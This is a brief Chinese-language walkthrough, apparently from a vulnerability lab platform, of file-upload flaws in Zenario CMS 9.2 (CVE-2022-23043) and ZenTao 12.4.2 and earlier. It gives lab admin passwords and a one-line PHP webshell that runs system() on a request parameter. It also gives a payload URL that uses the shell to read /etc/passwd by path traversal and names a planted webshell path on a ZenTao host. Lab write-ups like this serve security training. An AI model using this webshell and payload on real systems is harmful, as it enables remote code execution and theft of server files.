(CVE-2022-23043)(cnvd_2020_121325)
Zenario CMS 9.2 文件上传漏洞(CVE-2022-23043)
Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12







url:http://39.106.48.123:35352/organizer.php#zenario__organizer/panels/start_page



上传一个phar的木马文件:<?php if($_REQUEST[‘s’]) { system($_REQUEST[‘s’]); } else phpinfo(); ?>






payload:http://39.106.48.123:35352/public/downloads/W513Z/xixi.phar?s=cat%20../../../../../../../etc/passwd

zentao 文件上传 (cnvd_2020_121325)
漏洞介绍:禅道项目管理软件是国产的开源项目管理软件。 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。账户密码为admin:123456



您没有 权限 查看此处内容!
shell地址:http://192.168.85.130:10160/zentao/data/client/1/haha.php


